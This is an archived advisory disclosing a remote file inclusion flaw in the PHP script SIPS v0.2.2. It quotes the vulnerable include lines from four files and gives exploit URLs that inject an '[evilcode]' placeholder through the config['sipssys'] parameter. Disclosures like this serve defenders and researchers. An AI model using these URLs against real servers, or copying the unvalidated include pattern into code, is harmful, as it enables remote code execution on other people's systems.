SecurityvulnsSECURITYVULNS:DOC:22105SIPS v0.2.2 Remote File Inclusion Vulnerability
/===============================================================================================================================================\
|
| [o] SIPS v0.2.2 Remote File Inclusion Vulnerability
|
| Software : SIPS v0.2.2
| Vendor : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip
| Author : Cru3l.b0y
| |
| Home : WwW.DeltaHacking.Net
|===============================================================================================================================================|
|
| [o] Vulnerable file
|
| search.php
|
| include $config["sipssys"] ."/code/news.inc.php";
|
|
| readmore.php
|
| include $config["sipssys"] ."/code/news.inc.php";
|
| index.php
|
| include $config["sipssys"] ."/code/news.inc.php";
| include $config["sipssys"] ."/code/box.inc.php";
|
| search/submit.php
|
| include $config["sipssys"] ."/code/search.inc.php";
|
|
|
| [o] Exploit
|
| http://localhost/[path]/search.php?config["sipssys"]=[evilcode]
| http://localhost/[path]/readmore.php?config["sipssys"]=[evilcode]
| http://localhost/[path]/index.php?config["sipssys"]=[evilcode]
| http://localhost/[path]/search/submit.php?config["sipssys"]=[evilcode]
|